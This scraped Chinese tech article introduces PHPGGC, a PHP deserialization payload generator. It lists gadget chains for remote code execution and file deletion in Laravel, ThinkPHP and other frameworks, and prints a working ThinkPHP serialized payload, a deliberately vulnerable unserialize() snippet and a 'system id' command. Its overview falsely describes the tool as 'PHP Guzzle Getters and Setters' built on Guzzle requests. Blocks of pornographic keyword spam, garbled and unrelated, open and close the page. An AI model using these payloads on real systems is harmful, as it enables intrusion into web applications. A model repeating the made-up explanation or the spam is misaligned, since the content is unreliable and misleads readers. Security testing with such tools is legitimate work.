精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

PHP安全測試秘密武器 PHPGGC

開發(fā) 開發(fā)工具
PHPGGC是一個unserialize()有效負載庫,沿著一個從命令行或編程方式生成它們的工具。當在您沒有代碼的網(wǎng)站上遇到未序列化時,或者只是試圖構(gòu)建漏洞時,此工具允許您生成有效負載,而無需通過查找小工具并組合它們的繁瑣步驟。它可以被看作是frohoff的ysoserial的等價物,但用于PHP。

概述

PHPGGC,全稱為“PHP Guzzle Getters and Setters”,是一個庫,包含了預(yù)構(gòu)建的Guzzle HTTP客戶端請求對象,這些對象可以被用來利用PHP應(yīng)用中的反射或魔術(shù)方法漏洞。它的核心價值在于簡化了對PHP應(yīng)用程序潛在漏洞的探測過程,特別是對于那些可能存在的命令注入漏洞。

PHPGGC是一個unserialize()有效負載庫,沿著一個從命令行或編程方式生成它們的工具。當在您沒有代碼的網(wǎng)站上遇到未序列化時,或者只是試圖構(gòu)建漏洞時,此工具允許您生成有效負載,而無需通過查找小工具并組合它們的繁瑣步驟。它可以被看作是frohoff的ysoserial的等價物,但用于PHP。

目前,該工具支持小工具鏈,如:CodeIgniter 4,Doctrine,Drupal 7,Guzzle,Laravel,Magento,Monolog,Phalcon,Podio,Slim,SwiftMailer,Symfony,Wordpress,Yii和ZendFramework。

技術(shù)分析

該項目基于PHP編寫,并且利用了Guzzle,這是一個流行的HTTP客戶端庫,能夠處理HTTP請求。PHPGGC通過創(chuàng)建特殊的GETters和SETters,它們在發(fā)送HTTP請求時可以被惡意構(gòu)造,從而觸發(fā)不安全的代碼執(zhí)行。這種構(gòu)造方式使得安全研究人員能夠在各種不同的場景中快速驗證是否存在代碼注入風險,而無需手動編寫復(fù)雜的payload。

PHPGGC還支持命令行界面(CLI),允許用戶輕松地生成或搜索所需的GGC有效載荷。此外,其代碼結(jié)構(gòu)清晰,易于擴展,意味著你可以根據(jù)需要添加新的GGC類型或者自定義功能。

應(yīng)用場景

  • 滲透測試:在進行安全審計時,可以直接使用PHPGGC生成的payload嘗試觸發(fā)潛在的命令注入漏洞。
  • 教育與學習:理解如何構(gòu)建這類攻擊載荷有助于提高開發(fā)者的安全意識。
  • 自動化安全工具:集成到自動化安全掃描工具中,可以大規(guī)模檢測目標系統(tǒng)的安全性。

命令行使用

運行PHPGGC需要 PHP >= 5.6。

下載項目

git clone https://github.com/ambionics/phpggc.git

cd phpggc/

運行./phpggc -l獲取gadget鏈列表。

$ php ./phpggc -l



Gadget Chains
-------------

NAME                                      VERSION                                                 TYPE                      VECTOR          I    
Bitrix/RCE1                               17.x.x <= 22.0.300                                      RCE: Function Call        __destruct           
CakePHP/RCE1                              ? <= 3.9.6                                              RCE: Command              __destruct           
CakePHP/RCE2                              ? <= 4.2.3                                              RCE: Function Call        __destruct           
CodeIgniter4/FD1                          <= 4.3.6                                                File delete               __destruct           
CodeIgniter4/FD2                          <= 4.3.7                                                File delete               __destruct    
Laravel/RCE10                             5.6.0 <= 9.1.8+                                         RCE: Function Call        __toString           
Laravel/RCE11                             5.4.0 <= 9.1.8+                                         RCE: Function Call        __destruct           
Laravel/RCE12                             5.8.35, 7.0.0, 9.3.10                                   RCE: Function Call        __destruct      *    
Laravel/RCE13                             5.3.0 <= 9.5.1+                                         RCE: Function Call        __destruct      *    
Laravel/RCE14                             5.3.0 <= 9.5.1+                                         RCE: Function Call        __destruct           
Laravel/RCE15                             5.5.0 <= v9.5.1+                                        RCE: Function Call        __destruct           
Laravel/RCE16                             5.6.0 <= v9.5.1+                                        RCE: Function Call        __destruct           
Laravel/RCE17                             10.31.0                                                 RCE: Function Call        __destruct           
Laravel/RCE18                             10.31.0                                                 RCE: PHP Code             __destruct      *    
Laravel/RCE19                             10.34                                                   RCE: Command              __destruct     
Symfony/RCE14                             1.2.0 <= 1.2.12                                         RCE: Function Call        __wakeup        *    
Symfony/RCE15                             1.0.0 <= 1.1.9                                          RCE: Function Call        __wakeup        *    
Symfony/RCE16                             1.1.0 <= 1.5.18                                         RCE: Function Call        Serializable    *    
TCPDF/FD1                                 <= 6.3.5                                                File delete               __destruct      *    
ThinkPHP/FW1                              5.0.4-5.0.24                                            File write                __destruct      *    
ThinkPHP/FW2                              5.0.0-5.0.03                                            File write                __destruct      *    
ThinkPHP/RCE1                             5.1.x-5.2.x                                             RCE: Function Call        __destruct      *    
ThinkPHP/RCE2                             5.0.24                                                  RCE: Function Call        __destruct      *    
ThinkPHP/RCE3                             -6.0.1+                                                 RCE: Function Call        __destruct           
ThinkPHP/RCE4                             -6.0.1+                                                 RCE: Function Call        __destruct           
Typo3/FD1                                 4.5.35 <= 10.4.1                                        File delete               __destruct      *    
...

過濾器小工具鏈 `ThinkPHP。

$ php ./phpggc -l ThinkPHP

Gadget Chains
-------------

NAME             VERSION         TYPE                  VECTOR        I    
ThinkPHP/FW1     5.0.4-5.0.24    File write            __destruct    *    
ThinkPHP/FW2     5.0.0-5.0.03    File write            __destruct    *    
ThinkPHP/RCE1    5.1.x-5.2.x     RCE: Function Call    __destruct    *    
ThinkPHP/RCE2    5.0.24          RCE: Function Call    __destruct    *    
ThinkPHP/RCE3    -6.0.1+         RCE: Function Call    __destruct         
ThinkPHP/RCE4    -6.0.1+         RCE: Function Call    __destruct

每個小工具鏈都有。

  • Name:框架/庫的名稱
  • Version:小工具所使用的框架/庫的版本
  • Type:利用類型:RCE,文件寫入,文件讀取,包含
  • Vector:反序列化后觸發(fā)鏈的向量(__destruct(),__toString(),offsetGet(),...)
  • Informations:關(guān)于鏈條的其他信息

使用-i獲取有關(guān)鏈的詳細信息

$ php ./phpggc -i ThinkPHP/RCE4
Name           : ThinkPHP/RCE4
Version        : -6.0.1+
Type           : RCE: Function Call
Vector         : __destruct

./phpggc ThinkPHP/RCE4 <function> <parameter>

運行./phpggc <gadget-chain> [parameters]以獲取有效負載。

$ php ./phpggc ThinkPHP/RCE4 assert 'phpinfo()'


O:17:"think\model\Pivot":9:{s:19:"think\Modelexists";b:1;s:18:"think\Modelforce";b:1;s:21:"think\ModellazySave";b:1;s:9:"*suffix";O:17:"think\model\Pivot":9:{s:19:"think\Modelexists";N;s:18:"think\Modelforce";N;s:21:"think\ModellazySave";N;s:9:"*suffix";N;s:17:"think\Modeldata";a:1:{s:3:"key";a:1:{s:3:"key";s:9:"phpinfo()";}}s:21:"think\ModelwithAttr";a:1:{s:3:"key";a:1:{s:3:"key";s:6:"assert";}}s:7:"*json";a:1:{i:0;s:3:"key";}s:12:"*jsonAssoc";b:1;s:12:"*withEvent";N;}s:17:"think\Modeldata";a:1:{s:3:"key";a:1:{s:3:"key";s:9:"phpinfo()";}}s:21:"think\ModelwithAttr";N;s:7:"*json";N;s:12:"*jsonAssoc";N;s:12:"*withEvent";b:0;}

Wrapper

例如,如果易受攻擊的代碼看起來像這樣:tinywan_wrapper.php 腳本

<?php
$data = unserialize($_GET['data']);
print $data['message'];

執(zhí)行結(jié)果

php ./phpggc -w ./my_wrapper.php slim/rce1 system id


PHP Notice:  Undefined index: data in /home/www/build/phpggc/my_wrapper.php on line 2
PHP Notice:  Trying to access array offset on value of type bool in /home/www/build/phpggc/tinywan_wrapper.php on line 3
ERROR: Wrapper file does not define process_parameters(), process_object() or process_serialized()

你可以使用__toString()鏈,像這樣包裝它:tinywan_wrapper2.php 腳本

php ./phpggc -w ./tinywan_wrapper2.php slim/rce1 system id


a:1:{s:7:"message";O:18:"Slim\Http\Response":2:{s:10:"*headers";O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:14:"

責任編輯:武曉燕 來源: 開源技術(shù)小棧
相關(guān)推薦

2013-10-16 09:28:14

亞馬遜AWSSDN

2013-10-16 09:33:36

亞馬遜AWSSDN

2014-01-07 10:46:39

2011-08-11 17:05:26

2010-09-17 17:51:04

2023-05-08 14:54:00

AI任務(wù)HuggingGPT

2019-11-27 10:40:34

數(shù)據(jù)工具CIO

2015-03-30 16:58:05

秘密武器華為

2015-06-08 09:50:07

Android M谷歌

2022-02-11 10:47:17

CIOIT團隊企業(yè)

2019-11-27 10:38:37

數(shù)據(jù)分析數(shù)據(jù)準備工具

2025-05-14 00:01:10

RxJS異步編程響應(yīng)式

2009-07-28 10:36:58

云計算Google秘密武器

2023-02-24 10:26:34

語音AI人工智能

2011-06-02 10:24:11

iTravel蘋果

2023-11-08 08:22:23

2025-05-27 10:00:00

Python數(shù)據(jù)類代碼

2019-11-19 21:55:37

螞蟻金服雙11支付寶

2014-09-30 10:34:35

無線云飛魚星

2023-09-25 15:29:44

Go并發(fā)Goroutines
點贊
收藏

51CTO技術(shù)棧公眾號

人妻激情另类乱人伦人妻| 91精品久久久久久久久中文字幕 | brazzers在线观看| 波多野结衣一区二区三区 | 亚洲日本视频在线观看| 精品盗摄女厕tp美女嘘嘘| 欧美精品久久久久久久多人混战 | 亚洲免费视频观看| 91看片就是不一样| 久久77777| aaa国产一区| 国产精品一区二区三区免费视频| 99热精品免费| 深爱激情综合网| 日韩欧美国产一区在线观看| 欧美性猛交久久久乱大交小说| 国产成人无吗| 久久久久久久国产精品影院| 亚洲最大av在线| 日韩欧美在线观看免费| 综合天堂av久久久久久久| 亚洲精品日韩在线| 欧美一级片在线免费观看| 国产成人精品一区二| 在线免费观看日韩欧美| 蜜臀在线免费观看| 男人久久精品| 丁香网亚洲国际| 国产精品一区久久| 国产九色在线播放九色| 自拍偷拍欧美| www.99久久热国产日韩欧美.com| 波多野结衣有码| 国产一精品一av一免费爽爽| 在线免费观看日本欧美| 日日橹狠狠爱欧美超碰| 在线中文字幕电影| 国产精品剧情在线亚洲| 日本精品一区二区| 五十路在线观看| 国产91富婆露脸刺激对白| 国产一区二区丝袜| 中文字幕网址在线| 日韩黄色一级片| 3344国产精品免费看| 欧美又粗又大又长| 7777久久香蕉成人影院| www国产精品com| 波多野结衣一二三四区| 神马电影久久| 亚洲人成电影网站色…| 国产精品成人99一区无码| 伊人久久噜噜噜躁狠狠躁| 欧美日韩高清一区二区不卡| 欧美日韩在线免费播放| 欧美xxxxxx| 日韩欧美中文字幕在线播放| 国自产拍偷拍精品啪啪一区二区| 色av手机在线| 亚洲一区自拍偷拍| 国产精品12345| 51精品视频| 欧美日韩视频免费播放| av免费观看网| 婷婷六月国产精品久久不卡| 欧美性猛交99久久久久99按摩| 久色视频在线播放| 在线最新版中文在线| 国产白丝在线观看| 国产精品久久久久久久久久免费看| 色999日韩自偷自拍美女| 成年人视频在线看| 成人免费在线视频观看| 青青视频免费在线| 国产经典三级在线| 欧美性猛交xxxx免费看| 欧美伦理片在线看| 自拍偷拍亚洲| 精品成人私密视频| 亚洲人成人无码网www国产| 欧美一级精品| 欧美精品一二区| 欧美福利视频一区二区| 日韩成人免费电影| 91在线中文字幕| 欧洲av在线播放| 91日韩在线专区| 亚洲国产精品日韩| 污网站在线免费看| 色婷婷国产精品| 欧美第一页浮力影院| 日韩欧美中文字幕一区二区三区| 日韩av在线影院| 国精产品一区一区| 欧美亚洲另类激情另类| 第四色在线视频| 欧美人与拘性视交免费看| 这里只有精品在线观看| 欧美精品一级片| 久久精品男女| 亚洲一区二区在线| 日本黄在线观看| 亚洲欧洲制服丝袜| 日本三级免费观看| 久久9999免费视频| 亚洲人成电影在线播放| 久久r这里只有精品| 久久先锋影音| 国产精品大全| 黄色片免费在线观看| 精品久久中文字幕| 香蕉视频色在线观看| 欧美人与物videos另类xxxxx| 久久久国产精品亚洲一区| 日韩特级黄色片| 国产另类ts人妖一区二区| 日本一区二区久久精品| 暧暧视频在线免费观看| 欧美一区二区三区小说| 久久精品视频18| 亚洲精品九九| www.久久久| 黄网址在线观看| 色丁香久综合在线久综合在线观看| 三大队在线观看| 国产精品久久久乱弄| 日韩免费观看网站| 四虎在线视频| 亚洲h动漫在线| 中文字幕1区2区| 亚洲国产成人精品女人| 国产精品丝袜白浆摸在线| 蝌蚪视频在线播放| 一本一道波多野结衣一区二区| 国模无码视频一区| 精品白丝av| 国产精品一区免费观看| 牛牛精品视频在线| 日韩久久精品一区| 看片网站在线观看| 国产一区二区福利| 欧洲xxxxx| 国产一区二区视频在线看| 日韩中文字幕不卡视频| 日批视频免费观看| 欧美国产亚洲另类动漫| 妓院一钑片免看黄大片| 经典一区二区| 国产精品小说在线| 在线观看h片| 欧美视频完全免费看| 在线观看亚洲大片短视频| 媚黑女一区二区| 日韩中文一区| 国产91在线播放精品| 日韩av在线免费看| 91黑人精品一区二区三区| 久久精品一区二区三区不卡牛牛 | 88在线观看91蜜桃国自产| jizz18女人高潮| 精品一区二区在线视频| 99热这里只有精品7| 美女精品视频在线| 欧美激情视频在线| 色视频免费在线观看| 色哟哟一区二区在线观看| 伊人影院综合网| 黄页视频在线91| 成人免费性视频| 午夜精品影视国产一区在线麻豆| 日韩免费av片在线观看| 亚洲搞黄视频| 欧美v日韩v国产v| 国产美女激情视频| 国产精品蜜臀av| 色偷偷中文字幕| 日韩视频不卡| 日韩妆和欧美的一区二区| 外国成人毛片| 欧美激情欧美激情| 精品电影在线| 日韩一区二区三区电影| 日韩精品一区三区| 国产精品嫩草99a| 久久国产劲爆∧v内射| 免播放器亚洲| 老汉色影院首页| 在线日韩一区| 91香蕉国产在线观看| 国产高清中文字幕在线| 最近的2019中文字幕免费一页| 亚洲成人黄色片| 欧美日韩亚洲精品一区二区三区| 久久日免费视频| 菠萝蜜视频在线观看一区| 日本va中文字幕| 亚洲精品字幕| 一区二区三区视频| 天堂俺去俺来也www久久婷婷| 国产精品丝袜白浆摸在线| 白浆在线视频| 久久国产精彩视频| 成人亚洲综合天堂| 亚洲国产精品成人一区二区| 在线观看av大片| 欧美性videos高清精品| 麻豆changesxxx国产| 欧美国产综合色视频| 亚洲蜜桃精久久久久久久久久久久| 久久99精品国产麻豆婷婷| 99爱视频在线| 午夜久久99| 亚洲狠狠婷婷综合久久久| 欧美1区二区| 97久草视频| 中文成人在线| 国产精品久久久久久久久久久久 | 亚洲成av人片一区二区密柚| 美女视频久久| 加勒比视频一区| 99久久精品久久久久久ai换脸| 精品久久99| 国产98色在线| www.成人爱| 国内精品免费午夜毛片| av在线app| 久久韩国免费视频| 色网站免费在线观看| 国产一区二区激情| 裸体xxxx视频在线| 亚洲精品日韩在线| 男女视频在线观看| 亚洲免费人成在线视频观看| 婷婷五月综合久久中文字幕| 精品裸体舞一区二区三区| www.av网站| 日韩欧美久久久| www.97超碰| 精品国产麻豆免费人成网站| www.色播.com| 日韩你懂的在线观看| 精品人妻一区二区三区四区不卡| 91精品国产综合久久久久久| 91久久久久久久久久久久| 欧美日韩精品免费| 亚洲无码久久久久久久| 欧美日本一道本在线视频| 中文字幕av影视| 欧美日韩午夜精品| 一本色道久久综合无码人妻| 欧美日韩国产首页在线观看| 国产精品久久久久精| 91麻豆精品91久久久久久清纯| 国产一区二区女内射| 4438x成人网最大色成网站| 国产成a人亚洲精v品无码| 欧美一区二区网站| 男人天堂av网| 日韩www在线| 国产黄在线观看| 日韩在线中文视频| 青草影视电视剧免费播放在线观看| 欧美区二区三区| 国产日本在线播放| 99久久综合| 色哺乳xxxxhd奶水米仓惠香| 欧美精品日本| 成年人午夜免费视频| 久久三级视频| 中文字幕久久av| 国产suv精品一区二区三区| 国产 xxxx| 欧美激情一区三区| 欧美又粗又大又长| 色综合久久66| 国产美女主播在线观看| 亚洲国产欧美一区二区三区同亚洲 | 国产一区二区三区无遮挡| 先锋影音国产精品| 综合国产精品久久久| 亚洲人体大胆视频| 性欧美videossex精品| 国产精品18久久久久久久久| 黑丝av在线播放| 中文字幕一区二区三中文字幕| 免费中文字幕在线观看| 欧美日韩在线第一页| 97精品人妻一区二区三区在线 | 欧美日韩国产在线一区| 免费av网址在线| 国产精品资源网站| 国产熟妇久久777777| 亚洲精品国产精品乱码不99| 国产一级片毛片| 日韩无一区二区| 国产日本在线| 97久久久久久| 国产欧美88| 日韩欧美一区二区三区四区五区| 欧美日韩蜜桃| 久久国产这里只有精品| aaa亚洲精品| 欧美日韩在线观看免费| 欧美系列日韩一区| 亚洲欧洲成人在线| 欧美成人激情图片网| 欧美日韩激情电影| 精品中文字幕人| 一区二区三区在线电影| 少妇性l交大片| 99麻豆久久久国产精品免费 | 9色精品在线| wwwxxxx在线观看| 国产精品久久久久婷婷| 亚洲天堂一区在线| 精品国产一区二区三区久久影院| 69久久夜色| 国产精品96久久久久久| 美女av一区| 国产美女永久无遮挡| 激情图区综合网| 成人免费视频入口| 在线视频亚洲一区| 欧美视频综合| 68精品国产免费久久久久久婷婷| 日韩成人18| 日本女人高潮视频| 久久精品国产一区二区三| 亚洲午夜久久久久久久国产| 欧美性猛交丰臀xxxxx网站| 熟妇高潮一区二区三区| 久久久久国产一区二区三区| 国产成年精品| 亚洲国产精品女人| 国内成人精品2018免费看| 五月婷婷综合激情网| 欧美剧情电影在线观看完整版免费励志电影 | 国产亚洲视频在线观看| 成人爽a毛片免费啪啪| 久久综合九色综合网站| 亚洲欧美成人| 国产av自拍一区| 91久久人澡人人添人人爽欧美| 你懂得在线网址| 国产成人亚洲综合91精品| 亚洲电影一级片| 欧美日韩大尺度| 国产精品久久三区| 91久久久久国产一区二区| 久久资源免费视频| 欧美不卡在线观看| 成人免费a级片| 97久久精品人人做人人爽| 91视频免费网址| 亚洲最新av在线| 日韩黄色三级在线观看| 黄色污污在线观看| 成人激情校园春色| 五月天综合激情| 在线视频日韩精品| 亚洲综合伊人| 丰满的少妇愉情hd高清果冻传媒| www.99精品| 无码人妻丰满熟妇精品| 最近2019中文免费高清视频观看www99 | 日韩精品123区| 日韩精品资源二区在线| 成人在线黄色电影| 日韩视频专区| 国产精品12区| 国产一级18片视频| 色婷婷久久一区二区| 亚洲精品在线国产| 日韩在线xxx| 中文字幕人成不卡一区| 囯产精品久久久久久| 欧洲永久精品大片ww免费漫画| 成人精品天堂一区二区三区| 三级网站免费看| 欧美性xxxx18| av在线导航| 日韩国产高清一区| 国产精品系列在线观看| 精品人妻一区二区三区免费看| 综合136福利视频在线| 一区二区三区国产好| 久久久久久久少妇| 一区二区三区不卡在线观看 | av视屏在线播放| 亚洲在线观看免费| 91在线观看| 精品一区久久| 国产精品一区二区在线观看网站| 久久精品国产成人av| 免费av在线一区| 欧美天天综合| 在线天堂www在线国语对白| 欧美精品777| 香蕉久久免费电影| 欧美久久在线观看|